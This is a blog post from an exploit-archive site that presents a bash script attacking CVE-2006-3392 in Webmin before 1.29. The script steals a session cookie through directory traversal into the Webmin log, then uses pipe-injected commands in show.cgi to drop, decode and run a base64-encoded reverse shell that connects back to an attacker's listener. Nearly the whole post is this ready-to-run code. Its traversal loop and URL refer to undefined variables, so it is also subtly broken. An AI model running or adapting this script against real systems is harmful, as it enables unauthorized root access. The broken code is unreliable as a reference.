avatar
oxasploits
one zero day at a time
  • HOME
  • SERVICES
  • HOSTING
  • SPONSORS
  • CATEGORIES
  • PROJECTS
  • EXPLOITS
  • WORDLISTS
  • UPTIME
  • GITHUB
  • PRIVACY
  • ABOUT
  • PREVIOUS ENEAVORS
  • ARCHIVES
Home CVE-2006-3392 Exploit Code
Post
Large Logo

CVE-2006-3392 Exploit Code

By Marshall Whittaker
Posted 1 min read
#!/bin/bash
# Author: oxagast / Marshall Whittaker
# marshall@oxagast.org
# Thanks: enki
#
# girl i know you like this eggplant
# CVE-2006-3392
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/

HOST=$1
PORT=$2
LHOST=$3
LPORT=$4
if [ $# -lt 4 ]; then
  echo "Webmin <1.29 remote root exploit by oxagast"
  echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE."
  echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!"
  echo "Usage:"
  echo "  nc -l -p 7777"
  echo "  $0 10.0.0.4 10000 10.0.0.3 7777"
else
  CMD=$(echo "bash -p -i >& /dev/tcp/$LHOST/$LPORT 0>&1" | base64)
  echo $CMD
  CMD0="echo $CMD > /tmp/b64s"
  CMD1='base64 -d /tmp/b64s > /tmp/she11'
  CMD2='chmod a+x /tmp/she11'
  CMD3='/bin/bash /tmp/she11'
  echo "Webmin <1.29 remote root exploit by oxagast"
  echo "Server: $HOST:$PORT"
  echo "Getting cookie from webmin log..."
  for i in {1..20}; do
    ONONE=$OHONE"..%01"
  done
  SID=$(curl $HOST:$PORT/unauthenticated/$HA/var/webmin/webmin.log -s | tail -n 1 | cut -f 5 -d ' ' | tr -d '\n')
  echo "Setting cookie to: sid=$SID"
  echo "Copying base64 encoded shell..."

  UA='User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
  ACCEPT='Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
  LANG='Accept-Language: en-US,en;q=0.5'
  CONN='Connection: keep-alive'
  UPG='Upgrade-Insecure-Requests: 1'
  COOK="Cookie: testing=1; sid=$SID"

  curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD0|" -s -L
  sleep 1
  echo "Debase64ing shell..."
  curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD1|" -s -L
  sleep 1
  echo "Chmodding shell..."
  curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD2|" -s -L
  sleep 1
  echo "Trying to spawn..."
  curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD3|" -s -L
fi

If you enjoy my work, sponsor or hire me! I work hard keeping oxasploits running!
Bitcoin Address:
bc1qclqhff9dlvmmuqgu4907gh6gxy8wy8yqk596yp

Thank you so much and happy hacking!
This post is licensed under CC BY 4.0 by the author.
Share
Recently Updated
  • Jekyll minification optimization
  • Anatomy of a hardened Apache2 configuration
  • The importance of autonomous backups
  • Lock binaries in memory using vmtouch cache
  • Enumerating SUID files targeted for priv esc
Trending Tags
exploit vulnerabilities PoC 0day code-injection config perl RCE walkthrough bitcoin


  

Further Reading

Jun 14

Peripheral network reconnaissance OSINT

Intro to Reconnaissance Learning about a network from afar, whether actively or passively is always one of the first things you do when deciding to penetrate a computer system. There are a varie...

May 1

Bluetooth HCI HID Controller abuse RCE exploit

The Words of Caution This writeup is a lesson in what happens when we are not, and why we should be very, very cautious of what bluetooth devices we pair to. We’ll start with this, just to set t...

Feb 24

Writing the shortest valid C quine

For a while, I have had a fascination with code poetry (also things like “perl golf”). Elegance is quite beautiful, really. What is a quine? In short, it is a program that prints its own sourc...

-

-

© 2023 Marshall Whittaker. Some rights reserved.

| Home | Services | About | Wordlists | GitHub | Projects |
| Exploits | Services | Privacy| Endeavors | Status |
| Franklin | SPaste |